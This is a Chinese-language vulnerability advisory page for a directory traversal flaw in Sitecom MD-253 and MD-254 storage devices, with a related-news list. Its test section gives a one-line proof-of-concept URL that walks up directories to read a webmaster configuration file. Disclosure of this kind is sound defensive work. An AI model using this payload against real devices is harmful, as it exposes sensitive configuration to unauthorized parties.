MD-254目录穿越漏洞

发布日期：2012-09-03
更新日期：2012-09-05受影响系统：
Sitecom Sitecom MD-253
Sitecom MD-254
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 55371Sitecom MD-253是家庭存储中心解决方案。Sitecom MD-253和MD-254设备存在漏洞，可被恶意用户利用泄露敏感信息。<*来源：Alcyon

链接：http://secunia.com/advisories/50402/
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！http://www.example.com/cgi-bin/info.cgi？syslog&../../etc/sysconfig/config/webmaster.conf建议：
--------------------------------------------------------------------------------
厂商补丁：Sitecom
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.sitecom.com/wireless-modem-router-300n/p/859多个Conceptronic产品目录穿越漏洞Oracle Java SE远程JRE漏洞相关资讯目录穿越漏洞

VMware View Connection Server和（12/17/2012 19:58:37）
JsUpload "/tmp/uploader"目录穿越（12/04/2012 06:49:08）
Conceptronic CH3ENAS目录穿越漏洞（09/06/2012 06:16:29）

Huawei E585 pocket wifi 2设备目（12/15/2012 09:04:26）
InduSoft Web Studio NTWebServer （10/12/2012 19:47:25）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款